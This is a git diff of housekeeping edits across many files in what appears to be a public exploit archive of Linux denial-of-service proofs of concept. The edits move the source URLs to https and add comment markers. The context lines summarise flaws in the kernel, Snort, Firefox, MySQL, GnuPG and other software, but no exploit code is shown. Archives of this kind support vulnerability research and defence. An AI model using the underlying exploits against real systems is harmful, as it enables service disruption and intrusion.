Linux kernel is reported prone to multiple local vulnerabilities: diff --git a/exploits/linux/dos/24804.c b/exploits/linux/dos/24804.c index 478fa783b..cf7953e71 100644 --- a/exploits/linux/dos/24804.c +++ b/exploits/linux/dos/24804.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11842/info +source: https://www.securityfocus.com/bid/11842/info The Linux Kernel is reported prone to a local denial of service vulnerability. It is reported that the vulnerability exists due to a failure by 'aio_free_ring' to handle exceptional conditions. diff --git a/exploits/linux/dos/24815.txt b/exploits/linux/dos/24815.txt index 8a4ecf980..08eab1214 100644 --- a/exploits/linux/dos/24815.txt +++ b/exploits/linux/dos/24815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11881/info +source: https://www.securityfocus.com/bid/11881/info It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerability in its CD-key validation functionality. This issue is due to a failure of the SDK to properly check the length of user-supplied network data prior to copying it to a fixed-sized memory buffer. diff --git a/exploits/linux/dos/24828.txt b/exploits/linux/dos/24828.txt index 4e6f6b4ea..77f6892ff 100644 --- a/exploits/linux/dos/24828.txt +++ b/exploits/linux/dos/24828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11901/info +source: https://www.securityfocus.com/bid/11901/info It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content. diff --git a/exploits/linux/dos/25017.txt b/exploits/linux/dos/25017.txt index b65363f49..f7a566ad7 100644 --- a/exploits/linux/dos/25017.txt +++ b/exploits/linux/dos/25017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12016/info +source: https://www.securityfocus.com/bid/12016/info The uml_utilites uml_net application may permit unprivileged malicious local users to shut down the slip network interface. This is due to the program being installed setuid root by default. diff --git a/exploits/linux/dos/25046.c b/exploits/linux/dos/25046.c index df2dc73af..55eaa48dc 100644 --- a/exploits/linux/dos/25046.c +++ b/exploits/linux/dos/25046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12084/info +// source: https://www.securityfocus.com/bid/12084/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the DecodeTCPOptions() function of 'decode.c', and is as a result of a failure to sufficiently handle malicious TCP packets. diff --git a/exploits/linux/dos/25047.c b/exploits/linux/dos/25047.c index 4900d4238..26cda048f 100644 --- a/exploits/linux/dos/25047.c +++ b/exploits/linux/dos/25047.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12084/info +// source: https://www.securityfocus.com/bid/12084/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the DecodeTCPOptions() function of 'decode.c', and is as a result of a failure to sufficiently handle malicious TCP packets. diff --git a/exploits/linux/dos/25070.c b/exploits/linux/dos/25070.c index 98d2d10fe..f242293be 100644 --- a/exploits/linux/dos/25070.c +++ b/exploits/linux/dos/25070.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12397/info +// source: https://www.securityfocus.com/bid/12397/info ngIRCd is reported prone to a remote buffer overflow vulnerability. This issue presents itself because the application fails to perform proper boundary checks before copying user-supplied data into process buffers. diff --git a/exploits/linux/dos/25076.c b/exploits/linux/dos/25076.c index 2de776d3e..1ff67c8aa 100644 --- a/exploits/linux/dos/25076.c +++ b/exploits/linux/dos/25076.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12417/info +// source: https://www.securityfocus.com/bid/12417/info Multiple remote vulnerabilities affect PostgreSQL. These issues are due to design errors, buffer-mismanagement errors, and causes that are currently unspecified. diff --git a/exploits/linux/dos/25077.txt b/exploits/linux/dos/25077.txt index 2cedfe834..f236028c6 100644 --- a/exploits/linux/dos/25077.txt +++ b/exploits/linux/dos/25077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12418/info +source: https://www.securityfocus.com/bid/12418/info Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation. diff --git a/exploits/linux/dos/25164.txt b/exploits/linux/dos/25164.txt index 94c75d46e..914126248 100644 --- a/exploits/linux/dos/25164.txt +++ b/exploits/linux/dos/25164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12667/info +source: https://www.securityfocus.com/bid/12667/info Gaim is affected by a denial of service vulnerability during the download of a file. This issue can allow remote attackers to cause an affected client to fail. diff --git a/exploits/linux/dos/25234.sh b/exploits/linux/dos/25234.sh index 412512732..290a16c24 100755 --- a/exploits/linux/dos/25234.sh +++ b/exploits/linux/dos/25234.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/12837/info +# source: https://www.securityfocus.com/bid/12837/info # # The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines. # diff --git a/exploits/linux/dos/25287.c b/exploits/linux/dos/25287.c index f30211fcf..82add4978 100644 --- a/exploits/linux/dos/25287.c +++ b/exploits/linux/dos/25287.c @@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/dos/25303.txt b/exploits/linux/dos/25303.txt index 01c7923e9..9eedaefea 100644 --- a/exploits/linux/dos/25303.txt +++ b/exploits/linux/dos/25303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12919/info +source: https://www.securityfocus.com/bid/12919/info Multiple vendors' Telnet client applications are reported prone to a remote buffer-overflow vulnerability. This vulnerability reportedly occurs in the 'env_opt_add()' function in the 'telnet.c' source file, which is apparently common source for all the affected vendors. diff --git a/exploits/linux/dos/25322.c b/exploits/linux/dos/25322.c index 3035e3931..a972347ac 100644 --- a/exploits/linux/dos/25322.c +++ b/exploits/linux/dos/25322.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/12949/info +source: https://www.securityfocus.com/bid/12949/info A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks. diff --git a/exploits/linux/dos/25334.txt b/exploits/linux/dos/25334.txt index 4dfee97ba..b5478e410 100644 --- a/exploits/linux/dos/25334.txt +++ b/exploits/linux/dos/25334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12988/info +source: https://www.securityfocus.com/bid/12988/info Mozilla Suite/Firefox are reported prone to a memory-disclosure vulnerability. This issue can allow a remote attacker to access arbitrary heap memory. diff --git a/exploits/linux/dos/25429.c b/exploits/linux/dos/25429.c index 5e5d511ad..7625412ac 100644 --- a/exploits/linux/dos/25429.c +++ b/exploits/linux/dos/25429.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13190/info +// source: https://www.securityfocus.com/bid/13190/info Libsafe will normally kill an application when certain types of memory corruption are detected, preventing exploitation of some buffer overflow and format string vulnerabilities. A weakness has been reported that may allow Libsafe security failsafe mechanisms to be bypassed. diff --git a/exploits/linux/dos/25465.txt b/exploits/linux/dos/25465.txt index fbc53dcbe..1c3fd81f5 100644 --- a/exploits/linux/dos/25465.txt +++ b/exploits/linux/dos/25465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13273/info +source: https://www.securityfocus.com/bid/13273/info Logwatch is prone to a denial of vulnerability in the secure script. diff --git a/exploits/linux/dos/25525.c b/exploits/linux/dos/25525.c index 0146ced70..6af2f681d 100644 --- a/exploits/linux/dos/25525.c +++ b/exploits/linux/dos/25525.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13347/info +// source: https://www.securityfocus.com/bid/13347/info A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters. diff --git a/exploits/linux/dos/25527.txt b/exploits/linux/dos/25527.txt index 9b4380d23..542c33302 100644 --- a/exploits/linux/dos/25527.txt +++ b/exploits/linux/dos/25527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13351/info +source: https://www.securityfocus.com/bid/13351/info A remotely exploitable client-side buffer-overflow vulnerability affects ImageMagick. This issue occurs because the application fails to properly validate the length of user-supplied strings before copying them into static process buffers. diff --git a/exploits/linux/dos/25647.sh b/exploits/linux/dos/25647.sh index faced3396..0effa5671 100755 --- a/exploits/linux/dos/25647.sh +++ b/exploits/linux/dos/25647.sh @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/13589/info +source: https://www.securityfocus.com/bid/13589/info The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call. diff --git a/exploits/linux/dos/25943.txt b/exploits/linux/dos/25943.txt index f9c3e15a7..625c97569 100644 --- a/exploits/linux/dos/25943.txt +++ b/exploits/linux/dos/25943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14161/info +source: https://www.securityfocus.com/bid/14161/info oftpd is prone to a remotely exploitable buffer overflow. This may be triggered by a client through an overly long argument for the USER command. diff --git a/exploits/linux/dos/26248.sh b/exploits/linux/dos/26248.sh index 5f05698a4..281444b2b 100755 --- a/exploits/linux/dos/26248.sh +++ b/exploits/linux/dos/26248.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14790/info +source: https://www.securityfocus.com/bid/14790/info The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service. diff --git a/exploits/linux/dos/26249.c b/exploits/linux/dos/26249.c index f66a0bf5c..1f236d977 100644 --- a/exploits/linux/dos/26249.c +++ b/exploits/linux/dos/26249.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14796/info +// source: https://www.securityfocus.com/bid/14796/info A remote denial of service vulnerability affects Zebedee. This issue is due to a failure of the application to properly handle exceptional network requests. diff --git a/exploits/linux/dos/26251.c b/exploits/linux/dos/26251.c index f7b8fd162..b2f1f4223 100644 --- a/exploits/linux/dos/26251.c +++ b/exploits/linux/dos/26251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14811/info +// source: https://www.securityfocus.com/bid/14811/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the 'PrintTcpOptions()' function of 'log.c', and is a result of a failure to sufficiently handle malicious TCP packets. diff --git a/exploits/linux/dos/26340.c b/exploits/linux/dos/26340.c index b4325da82..fa90d9ead 100644 --- a/exploits/linux/dos/26340.c +++ b/exploits/linux/dos/26340.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15048/info +// source: https://www.securityfocus.com/bid/15048/info up-IMAPProxy is reported prone to multiple unspecified remote format-string vulnerabilities. diff --git a/exploits/linux/dos/26342.txt b/exploits/linux/dos/26342.txt index d62c3d5de..8110db467 100644 --- a/exploits/linux/dos/26342.txt +++ b/exploits/linux/dos/26342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15062/info +source: https://www.securityfocus.com/bid/15062/info WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer. diff --git a/exploits/linux/dos/26382.c b/exploits/linux/dos/26382.c index 792a2b42e..10ecc6728 100644 --- a/exploits/linux/dos/26382.c +++ b/exploits/linux/dos/26382.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15156/info +source: https://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26489.c b/exploits/linux/dos/26489.c index e4949867c..ce10ba2ca 100644 --- a/exploits/linux/dos/26489.c +++ b/exploits/linux/dos/26489.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15365/info +source: https://www.securityfocus.com/bid/15365/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed. diff --git a/exploits/linux/dos/26601.pl b/exploits/linux/dos/26601.pl index 25b059d7e..7b89f5d69 100755 --- a/exploits/linux/dos/26601.pl +++ b/exploits/linux/dos/26601.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15577/info +source: https://www.securityfocus.com/bid/15577/info The 'unalz' utility is prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ALZ archive that contains a file with a long name. diff --git a/exploits/linux/dos/26648.c b/exploits/linux/dos/26648.c index 0a6447cc3..0e99ec114 100644 --- a/exploits/linux/dos/26648.c +++ b/exploits/linux/dos/26648.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15627/info +source: https://www.securityfocus.com/bid/15627/info Linux kernel is susceptible to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26666.c b/exploits/linux/dos/26666.c index 2a829ebd3..e05159438 100644 --- a/exploits/linux/dos/26666.c +++ b/exploits/linux/dos/26666.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15649/info +// source: https://www.securityfocus.com/bid/15649/info CenterICQ is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/26749.c b/exploits/linux/dos/26749.c index 5e998dd8c..35c76e724 100644 --- a/exploits/linux/dos/26749.c +++ b/exploits/linux/dos/26749.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15745/info +source: https://www.securityfocus.com/bid/15745/info Linux kernel is susceptible to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26811.c b/exploits/linux/dos/26811.c index dc6694ca4..87dfee133 100644 --- a/exploits/linux/dos/26811.c +++ b/exploits/linux/dos/26811.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15846/info +source: https://www.securityfocus.com/bid/15846/info Linux kernel is prone to a local integer-overflow vulnerability. diff --git a/exploits/linux/dos/26915.txt b/exploits/linux/dos/26915.txt index b7c63394c..6cd7144fa 100644 --- a/exploits/linux/dos/26915.txt +++ b/exploits/linux/dos/26915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15981/info +source: https://www.securityfocus.com/bid/15981/info Blender is susceptible to an integer-overflow vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in a memory allocation and copy operation. diff --git a/exploits/linux/dos/27031.c b/exploits/linux/dos/27031.c index 31cea98bd..5bbeff96b 100644 --- a/exploits/linux/dos/27031.c +++ b/exploits/linux/dos/27031.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/16135/info +source: https://www.securityfocus.com/bid/16135/info Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/27144.py b/exploits/linux/dos/27144.py index 01f4e6fe4..581310d41 100755 --- a/exploits/linux/dos/27144.py +++ b/exploits/linux/dos/27144.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16407/info +source: https://www.securityfocus.com/bid/16407/info CommuniGate Pro Server is prone to a remote denial-of-service vulnerability with a potential for arbitrary code execution. This issue reportedly resides in the LDAP component of the application. diff --git a/exploits/linux/dos/27145.txt b/exploits/linux/dos/27145.txt index 8fcaaab0a..44d16b23a 100644 --- a/exploits/linux/dos/27145.txt +++ b/exploits/linux/dos/27145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16408/info +source: https://www.securityfocus.com/bid/16408/info GNOME Evolution email client is prone to a denial-of-service vulnerability when processing messages containing inline XML file attachments with excessively long strings. diff --git a/exploits/linux/dos/27246.txt b/exploits/linux/dos/27246.txt index 79c56ffd9..4279ec8a0 100644 --- a/exploits/linux/dos/27246.txt +++ b/exploits/linux/dos/27246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16716/info +source: https://www.securityfocus.com/bid/16716/info Mozilla Thunderbird is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/27253.txt b/exploits/linux/dos/27253.txt index 6903ab9fa..32a8883b1 100644 --- a/exploits/linux/dos/27253.txt +++ b/exploits/linux/dos/27253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16741/info +source: https://www.securityfocus.com/bid/16741/info Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang. diff --git a/exploits/linux/dos/27257.html b/exploits/linux/dos/27257.html index eac4e2475..4233c0eca 100644 --- a/exploits/linux/dos/27257.html +++ b/exploits/linux/dos/27257.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16770/info +source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. diff --git a/exploits/linux/dos/27425.txt b/exploits/linux/dos/27425.txt index f4fccf24c..201abe068 100644 --- a/exploits/linux/dos/27425.txt +++ b/exploits/linux/dos/27425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17126/info +source: https://www.securityfocus.com/bid/17126/info Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/linux/dos/27581.txt b/exploits/linux/dos/27581.txt index 028f79dd1..d583174ab 100644 --- a/exploits/linux/dos/27581.txt +++ b/exploits/linux/dos/27581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17415/info +source: https://www.securityfocus.com/bid/17415/info The Perl Imager module is susceptible to a denial-of-service vulnerability. This issue is due to a failure of the software to properly handle unexpected image data. diff --git a/exploits/linux/dos/27635.txt b/exploits/linux/dos/27635.txt index 20030d78a..733a94c01 100644 --- a/exploits/linux/dos/27635.txt +++ b/exploits/linux/dos/27635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17499/info +source: https://www.securityfocus.com/bid/17499/info Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang. diff --git a/exploits/linux/dos/27641.txt b/exploits/linux/dos/27641.txt index b67ba005a..f387f67a2 100644 --- a/exploits/linux/dos/27641.txt +++ b/exploits/linux/dos/27641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17513/info +source: https://www.securityfocus.com/bid/17513/info Opera is prone to a buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input before using it in a string-copy operation. diff --git a/exploits/linux/dos/27670.txt b/exploits/linux/dos/27670.txt index fc399e3f3..d728fc410 100644 --- a/exploits/linux/dos/27670.txt +++ b/exploits/linux/dos/27670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17579/info +source: https://www.securityfocus.com/bid/17579/info The xine package is reported prone to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27723.txt b/exploits/linux/dos/27723.txt index 05b837df9..fa74f792c 100644 --- a/exploits/linux/dos/27723.txt +++ b/exploits/linux/dos/27723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17645/info +source: https://www.securityfocus.com/bid/17645/info Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server. diff --git a/exploits/linux/dos/27762.txt b/exploits/linux/dos/27762.txt index c218272c8..3e55ab6b8 100644 --- a/exploits/linux/dos/27762.txt +++ b/exploits/linux/dos/27762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17730/info +source: https://www.securityfocus.com/bid/17730/info LibTIFF is affected by multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/27764.txt b/exploits/linux/dos/27764.txt index 662f5d11e..f323f52c0 100644 --- a/exploits/linux/dos/27764.txt +++ b/exploits/linux/dos/27764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17732/info +source: https://www.securityfocus.com/bid/17732/info Applications using the LibTIFF library are prone to an integer-overflow vulnerability. diff --git a/exploits/linux/dos/27765.txt b/exploits/linux/dos/27765.txt index b64a5ba4f..b06df5cd4 100644 --- a/exploits/linux/dos/27765.txt +++ b/exploits/linux/dos/27765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17733/info +source: https://www.securityfocus.com/bid/17733/info Applications using the LibTIFF library are prone to a double-free vulnerability; a fix is available. diff --git a/exploits/linux/dos/27791.txt b/exploits/linux/dos/27791.txt index 39430c12a..f3f156a0f 100644 --- a/exploits/linux/dos/27791.txt +++ b/exploits/linux/dos/27791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17769/info +source: https://www.securityfocus.com/bid/17769/info The xine package is susceptible to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27856.txt b/exploits/linux/dos/27856.txt index b0fc8cf9c..0ed6a81b1 100644 --- a/exploits/linux/dos/27856.txt +++ b/exploits/linux/dos/27856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17950/info +source: https://www.securityfocus.com/bid/17950/info GNU 'binutils' is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/27875.c b/exploits/linux/dos/27875.c index da81c395b..5a6789ecc 100644 --- a/exploits/linux/dos/27875.c +++ b/exploits/linux/dos/27875.c @@ -1,3 +1,4 @@ +/* # Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc # Date: 2013/08/25 # Exploit Author: x90c @@ -18,6 +19,7 @@ attached original advisory too I want to submit the poc, sample file only http://www.x90c.org/advisories/xadv_2013001_libtiff.txt +*/ #include diff --git a/exploits/linux/dos/27903.txt b/exploits/linux/dos/27903.txt index d76c188f3..b8fb1c215 100644 --- a/exploits/linux/dos/27903.txt +++ b/exploits/linux/dos/27903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18078/info +source: https://www.securityfocus.com/bid/18078/info Dia is prone to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27925.txt b/exploits/linux/dos/27925.txt index 6759e2a5b..7f4c70e46 100644 --- a/exploits/linux/dos/27925.txt +++ b/exploits/linux/dos/27925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18183/info +source: https://www.securityfocus.com/bid/18183/info The Linux kernel is prone to a local denial-of-service vulnerability. This issue is due to a flaw in the 'proc' filesystem. diff --git a/exploits/linux/dos/27981.c b/exploits/linux/dos/27981.c index 962042c75..2dd38d109 100644 --- a/exploits/linux/dos/27981.c +++ b/exploits/linux/dos/27981.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18294/info +// source: https://www.securityfocus.com/bid/18294/info The GD Graphics Library is prone to a denial-of-service vulnerability. Attackers can trigger an infinite-loop condition when the library tries to handle malformed image files. diff --git a/exploits/linux/dos/28026.txt b/exploits/linux/dos/28026.txt index 99f349494..411d190ff 100644 --- a/exploits/linux/dos/28026.txt +++ b/exploits/linux/dos/28026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18439/info +source: https://www.securityfocus.com/bid/18439/info MySQL is susceptible to a remote denial-of-service vulnerability. This issue is due to the database server's failure to properly handle unexpected input. diff --git a/exploits/linux/dos/28077.txt b/exploits/linux/dos/28077.txt index 4589227b5..07b728cc2 100644 --- a/exploits/linux/dos/28077.txt +++ b/exploits/linux/dos/28077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18554/info +source: https://www.securityfocus.com/bid/18554/info GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28160.txt b/exploits/linux/dos/28160.txt index fca18bb5b..a0b36f060 100644 --- a/exploits/linux/dos/28160.txt +++ b/exploits/linux/dos/28160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18794/info +source: https://www.securityfocus.com/bid/18794/info The mpg123 application is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28220.txt b/exploits/linux/dos/28220.txt index 9d3bbc922..1a42c7635 100644 --- a/exploits/linux/dos/28220.txt +++ b/exploits/linux/dos/28220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18978/info +source: https://www.securityfocus.com/bid/18978/info KDE Konqueror is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/28234.txt b/exploits/linux/dos/28234.txt index 5940a9f32..9d8c13223 100644 --- a/exploits/linux/dos/28234.txt +++ b/exploits/linux/dos/28234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19032/info +source: https://www.securityfocus.com/bid/19032/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. diff --git a/exploits/linux/dos/28257.txt b/exploits/linux/dos/28257.txt index 6335f2ab1..99b0d43ff 100644 --- a/exploits/linux/dos/28257.txt +++ b/exploits/linux/dos/28257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19110/info +source: https://www.securityfocus.com/bid/19110/info GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28348.txt b/exploits/linux/dos/28348.txt index a43c3ef0a..201e73d17 100644 --- a/exploits/linux/dos/28348.txt +++ b/exploits/linux/dos/28348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19381/info +source: https://www.securityfocus.com/bid/19381/info ClamAV is prone to a heap buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28358.txt b/exploits/linux/dos/28358.txt index d44e5b1b3..8d2403016 100644 --- a/exploits/linux/dos/28358.txt +++ b/exploits/linux/dos/28358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19396/info +source: https://www.securityfocus.com/bid/19396/info The Linux kernel is susceptible to a remote denial-of-service vulnerability because the EXT3 filesystem code fails to properly handle unexpected conditions. diff --git a/exploits/linux/dos/28367.txt b/exploits/linux/dos/28367.txt index 33fa41316..04855fd4d 100644 --- a/exploits/linux/dos/28367.txt +++ b/exploits/linux/dos/28367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19450/info +source: https://www.securityfocus.com/bid/19450/info AlsaPlayer is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. diff --git a/exploits/linux/dos/28380.txt b/exploits/linux/dos/28380.txt index f7aeb1a19..dbc32a64e 100644 --- a/exploits/linux/dos/28380.txt +++ b/exploits/linux/dos/28380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19488/info +source: https://www.securityfocus.com/bid/19488/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. This issue is due to a race condition that may result in double-free or other memory-corruption issues. diff --git a/exploits/linux/dos/28383.txt b/exploits/linux/dos/28383.txt index 132458158..c83efb2d7 100644 --- a/exploits/linux/dos/28383.txt +++ b/exploits/linux/dos/28383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19507/info +source: https://www.securityfocus.com/bid/19507/info ImageMagick is prone to a remote heap buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28384.txt b/exploits/linux/dos/28384.txt index cac98c818..616692973 100644 --- a/exploits/linux/dos/28384.txt +++ b/exploits/linux/dos/28384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19508/info +source: https://www.securityfocus.com/bid/19508/info The libmusicbrainz library is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. diff --git a/exploits/linux/dos/28386.txt b/exploits/linux/dos/28386.txt index fc120bfb6..61d892b76 100644 --- a/exploits/linux/dos/28386.txt +++ b/exploits/linux/dos/28386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19516/info +source: https://www.securityfocus.com/bid/19516/info Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/28391.html b/exploits/linux/dos/28391.html index fe6b02e9e..9bc63d700 100644 --- a/exploits/linux/dos/28391.html +++ b/exploits/linux/dos/28391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19534/info +source: https://www.securityfocus.com/bid/19534/info Mozilla Firefox is prone to a remote memory-corruption vulnerability because of a race condition that may result in double-free or other memory-corruption issues. diff --git a/exploits/linux/dos/28775.pl b/exploits/linux/dos/28775.pl index a6b729029..f3da3da8c 100755 --- a/exploits/linux/dos/28775.pl +++ b/exploits/linux/dos/28775.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20416/info +source: https://www.securityfocus.com/bid/20416/info ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. diff --git a/exploits/linux/dos/28816.txt b/exploits/linux/dos/28816.txt index 118c9819f..a21af948c 100644 --- a/exploits/linux/dos/28816.txt +++ b/exploits/linux/dos/28816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20539/info +source: https://www.securityfocus.com/bid/20539/info KMail is prone to an unspecified denial-of-service vulnerability. diff --git a/exploits/linux/dos/28895.txt b/exploits/linux/dos/28895.txt index 579002306..fbafaa3ad 100644 --- a/exploits/linux/dos/28895.txt +++ b/exploits/linux/dos/28895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20870/info +source: https://www.securityfocus.com/bid/20870/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/28912.txt b/exploits/linux/dos/28912.txt index ab41b71e1..b4580168a 100644 --- a/exploits/linux/dos/28912.txt +++ b/exploits/linux/dos/28912.txt @@ -1,4 